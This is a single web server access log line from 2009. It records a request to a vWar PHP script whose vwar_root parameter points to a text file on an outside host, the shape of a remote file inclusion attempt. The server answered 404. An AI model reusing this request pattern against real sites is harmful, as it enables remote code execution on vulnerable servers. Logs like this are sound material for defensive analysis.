122.116.178.20 - - [24/Mar/2009:02:10:07 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
